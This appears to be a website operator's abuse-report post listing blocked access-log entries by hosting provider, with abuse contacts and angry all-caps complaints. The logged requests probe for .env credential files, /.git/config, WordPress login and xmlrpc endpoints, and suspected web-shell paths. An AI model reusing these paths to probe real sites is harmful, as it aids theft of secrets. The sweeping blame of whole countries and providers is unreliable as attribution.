AS55286 – B2 Net Solutions Inc. – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-system@servermania.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! – THIS IS VERY IGNORANT!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
69.4.87.74 www.website*x.com – – [21/Sep/2025:08:30:32 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G930V Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36“
69.4.87.74 www.website*x.com – – [21/Sep/2025:08:30:33 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1“
69.4.87.74 www.website*x.com – – [21/Sep/2025:08:30:33 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G930V Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36“

MAIL NR. 6 – Hacker-Idiots from SUNDAY!

abuse@lir.ae,noc@internet-webhosting.com,abuse@virtualine.org,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com

AS216341 – OPTIMA LLC – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@lir.ae – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
AE AND RUSSIA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
NEXT ONE TODAY WITH SAME IP!!! – HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
185.39.19.34 website*x.com – – [21/Sep/2025:02:08:40 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
185.39.19.34 website*x.com – – [21/Sep/2025:02:08:40 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
185.39.19.34 website*x.com – – [21/Sep/2025:02:08:40 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
185.39.19.34 website*x.com – – [21/Sep/2025:02:08:40 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“

AS132241 – SKSA TECHNOLOGY SDN BHD – HERE WITH 2 IP´S!!! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
noc@internet-webhosting.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.8.27.44 www.website*x.com – – [21/Sep/2025:04:49:47 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.44 www.website*x.com – – [21/Sep/2025:04:49:47 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.44 www.website*x.com – – [21/Sep/2025:04:49:47 +0200] „GET /laravel/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.44 www.website*x.com – – [21/Sep/2025:04:49:48 +0200] „GET /public/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.44 www.website*x.com – – [21/Sep/2025:04:49:48 +0200] „GET /app/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.44 www.website*x.com – – [21/Sep/2025:04:49:48 +0200] „GET /web/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
+
103.8.27.27 www.website*x.com – – [21/Sep/2025:15:05:50 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [21/Sep/2025:15:05:50 +0200] „GET /crm/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [21/Sep/2025:15:05:50 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [21/Sep/2025:15:05:51 +0200] „GET /backend/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [21/Sep/2025:15:05:51 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.209.157.93 website*x.com – – [21/Sep/2025:05:41:07 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; FreeBSD amd64; rv:54.0) Gecko/20100101 Firefox/54.0“

AS8075 – Microsoft Corporation – NEXT ONE TODAY!!! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
WE REPORT THIS SINCE WEEKS AND MICROSOFT DOES NOTHING!!!
4.225.220.46 website*x.com – – [21/Sep/2025:07:35:19 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 7 – Hacker-Idiots from SUNDAY!

abuse@virtualine.org,abuse@vdsina.ru

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.209.157.93 website*x.com – – [21/Sep/2025:04:12:43 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0“

AS48282 – Hosting technology LTD – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vdsina.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
195.2.70.209 website*x.com – – [21/Sep/2025:13:37:38 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36“

MAIL NR. 8 – Hacker-Idiots from SUNDAY!

ip-admin@fluxtelecom.com,hostmaster@nic.ad.jp,ipas@cnnic.cn,tao.li@yun-idc.com,hong.meng@yun-idc.com

AS6079 – RCN – HERE WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ip-admin@fluxtelecom.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
161.115.239.79 www.website*x.de – – [21/Sep/2025:04:40:29 +0200] „GET / HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“
161.115.239.171 website*x.de – – [21/Sep/2025:04:40:36 +0200] „GET / HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/140.0.7339.16 Safari/537.36“

AS2516 – KDDI CORPORATION – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hostmaster@nic.ad.jp – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
240b:253:b422:5b00:993e:b8a6:3241:ae7a website*x.de – – [21/Sep/2025:08:20:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/82.0.0.0 Safari/537.36“

AS63199 – CDS Global Cloud Co., Ltd – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ipas@cnnic.cn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
CHINA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:37:39 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:37:42 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:37:45 +0200] „GET / HTTP/1.0“ 403 – „-“ „-“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:37:49 +0200] „GET /favicon.ico HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:37:52 +0200] „GET /favicon.ico HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:55:26 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:55:30 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:55:34 +0200] „GET / HTTP/1.0“ 403 – „-“ „-“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:55:37 +0200] „GET /favicon.ico HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
2400:5280:403:6::c website*x.com – – [21/Sep/2025:08:55:40 +0200] „GET /favicon.ico HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“

MAIL NR. 9 – Hacker-Idiots from SUNDAY!

prasad@akhurathacpl.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,qcloud_net_duty@tencent.com,tencent_idc@tencent.com,

AS58678 – Intech Online Private Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
prasad@akhurathacpl.com
103.209.18.96 website*x.com – – [21/Sep/2025:09:50:52 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/87.0.0.0 Safari/537.36“

AS8075 – Microsoft Corporation – NEXT ONE TODAY!!! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
WE REPORT THIS TYP OF STUPID HACKING-ATTEMPTS SINCE WEEKS AND MICROSOFT DOES NOTHING!!!
52.169.141.253 website*x.com – – [21/Sep/2025:10:39:27 +0200] „GET /abcd.php HTTP/1.0“ 302 – „-“ „-“

AS132203 – Tencent Building, Kejizhongyi Avenue – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
qcloud_net_duty@tencent.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
DAILY REFERRER-SPAM S H I T TO THE UNWANTED WEBSITE gbnadvisors.com!!!
WE REPORT THIS REFERRER-SPAM SINCE WEEKS AND TENCENT DOES NOTHING!!!
43.166.242.189 www.website*x.com – – [21/Sep/2025:11:24:55 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

MAIL NR. 10 – Hacker-Idiots from SUNDAY!

admin@serveroffer.lt, abuse@serveroffer.lt, support@serveroffer.lt, info@serveroffer.lt,abuse@clouvider.net,abuse@us.leaseweb.com

AS209605 – UAB Host Baltic – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – NOW NO RESPONSE AGAIN… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT THIS SINCE MONTHS AND UAB Host Baltic DOES NOTHING!!!
91.224.92.127 www.website*x.com – – [21/Sep/2025:11:50:16 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
91.224.92.127 www.website*x.com – – [21/Sep/2025:11:50:16 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.127 www.website*x.com – – [21/Sep/2025:11:50:16 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0“

AS62240 – Clouvider – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@clouvider.net – – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
91.199.118.221 www.website*x.com – – [21/Sep/2025:12:14:37 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (compatible; GoParserBot/1.0)“

AS19148 – Leaseweb USA, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@us.leaseweb.com – IS ALWAYS ANSWERED AND STOP THIS HACKER-IDIOTS! – THIS IS VERY GOOD!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
23.81.59.19 www.website*x.com – – [21/Sep/2025:12:42:59 +0200] „GET / HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“

MAIL NR. 11 – Hacker-Idiots from SUNDAY!

abuse@cloudflare.com,abuse@hathway.net,anti-spam@chinatelecom.cn,ipreport.sd@chinatelecom.cn

AS13335 – Cloudflare, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cloudflare.com – RESPONSE WITH TICKET SYSTEM. STOP THE HACKER IDIOTS! THAT’S GOOD!!!
2a09:bac5:30d9:191::28:139 website*x.com – – [21/Sep/2025:12:32:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS17488 – Hathway IP Over Cable Internet – IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hathway.net – FIRST ABUSE-MAIL TO THIS PROVIDER! WE´RE WAITING FOR ANSWER BUT WE WAITING NOT LONG TIME!
27.5.201.62 website*x.com – – [21/Sep/2025:12:43:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; x86) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.0.0 Safari/537.36“

AS58519 – Cloud Computing Corporation – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
anti-spam@chinatelecom.cn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
CHINA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
182.43.70.143 website*x.com – – [21/Sep/2025:12:49:55 +0200] „GET / HTTP/1.0“ 403 – „http://www.website*x.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

MAIL NR. 1 – Hacker-Idiots from SATURDAY!

abuse@hostinode.com,abuse@lir.ae,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,

AS216099 – EMRE ANIL ARSLAN – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostinode.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a0f:85c1:b3c:1:fdb6:b70f:288e:f102 website*x.com – – [20/Sep/2025:05:39:36 +0200] „GET /assets/images/accesson.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0“
2a0f:85c1:b3c:1:fdb6:b70f:288e:f102 website*x.com – – [20/Sep/2025:05:39:38 +0200] „GET /accesson.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0“

AS216341 – OPTIMA LLC – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@lir.ae – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
185.39.19.97 website*x.com – – [20/Sep/2025:12:20:04 +0200] „GET / HTTP/1.0“ 403 – „https://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
185.39.19.97 website*x.com – – [20/Sep/2025:12:20:04 +0200] „GET / HTTP/1.0“ 403 – „https://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“

AS40021 – Contabo Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
157.173.205.208 website*x.com – – [20/Sep/2025:14:46:21 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“

MAIL NR. 2 – Hacker-Idiots from SATURDAY!

abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,

AS16276 – OVH SAS – NEXT ONE TODAY!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ONLY ONE AUTOMATC ANSWER, NO MORE INFO! – ABUSE PER EMAIL IS STANDARD!!!
51.75.157.203 www.website*x.de – – [20/Sep/2025:05:05:51 +0200] „HEAD /wp-content/plugins/wordpress-corde/wordpresse-kore.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.75.157.203 www.website*x.de – – [20/Sep/2025:05:05:51 +0200] „HEAD /wp-content/plugins/wordpress-core/wordpress-core.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS51167 – Contabo GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
DAILY REFERRER-SPAM S H I T TO THE DUBIOUS WEBSITE BINANCE.COM!!!
185.255.131.130 www.website*x.de – – [20/Sep/2025:11:44:12 +0200] „GET /wp-admin/css HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

MAIL NR. 3 – Hacker-Idiots from SATURDAY!

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,google-cloud-compliance@google.com, network-abuse@google.com

AS396982 – Google LLC – HERE WITH 4 IP´S!!! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:45 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:45 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Safari/537.36“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:45 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:45 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:45 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:45 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 Edg/125.0.2535.51“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:46 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.140 Safari/537.36 Vivaldi/6.4.3160.47“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:46 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.86 Safari/537.36 Brave/1.62.162“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:46 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Android 13; Mobile; rv:124.0) Gecko/124.0 Firefox/124.0“
34.27.61.205 website*x.com – – [20/Sep/2025:03:07:46 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; Nokia 2720 Flip) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36 KAIOS/2.5“
+ Here are we have a 403 but when it´s a 200, this idiots start to try to hacking!!!
34.76.174.199 website*x.com – – [20/Sep/2025:03:52:51 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
34.76.174.199 website*x.com – – [20/Sep/2025:03:52:51 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
+
34.14.2.1 www.website*x.com – – [20/Sep/2025:03:52:52 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
34.14.2.1 www.website*x.com – – [20/Sep/2025:03:52:53 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
+
34.38.235.62 website*x.com – – [20/Sep/2025:03:53:17 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36“
34.38.235.62 www.website*x.com – – [20/Sep/2025:03:53:19 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36“

AS12695 – LLC Digital Network – HERE WITH 2 IP´S – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
